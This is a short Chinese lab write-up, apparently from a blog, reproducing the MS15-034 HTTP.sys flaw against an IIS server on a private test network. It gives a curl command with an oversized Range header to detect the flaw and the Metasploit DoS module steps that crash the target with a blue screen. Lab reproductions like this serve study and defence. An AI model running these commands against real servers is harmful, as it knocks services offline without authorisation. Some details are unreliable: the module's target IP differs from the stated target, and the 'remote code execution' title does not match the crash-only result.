sys远程代码执行漏洞复现

sys远程代码执行漏洞

  • 目标靶机

  • 服务器类型: 型号sever2008 R2 64位。

  • IP: 192.168.70.43

  • 服务器类型 :web

  • 中间件 : IIS

  • 攻击者IP: 192.168.70.42(这里不需要用到)

  • 机型: kali

  • 这个漏洞也称ms15-034,能使服务器蓝屏重启,复现用的是kali的工具MSF.

  • 我们先来检测这个漏洞:使用curl工具来检测!

  • 输入:curl http://192.168.70.43 -H “Host: 192.168.70.43” -H “Range: bytes=0-18446744073709551615”

  • sys远程代码执行漏洞复现_第1张图片

  • 出现Requested Rabge Not Satisfiable说明存在ms15-034这个漏洞

  • 如果是如下则漏洞判断不存在

  • sys远程代码执行漏洞复现_第2张图片

  • 使用metasploit复现

  • msf有ms15-034的漏洞信息
    sys远程代码执行漏洞复现_第3张图片在这里选择:auxiliary/dos/http/ms15_034_ulonglongadd 模块攻击

  • use auxiliary/dos/http/ms15_034_ulonglongadd

  • 并配置好你的目标IP:

  • set RHOSTS 192.168.80.130

  • sys远程代码执行漏洞复现_第4张图片
    用run命令攻击

sys远程代码执行漏洞复现_第5张图片

  • 攻击成功,复现成功!目标蓝屏!

你可能感兴趣的:(漏洞复现)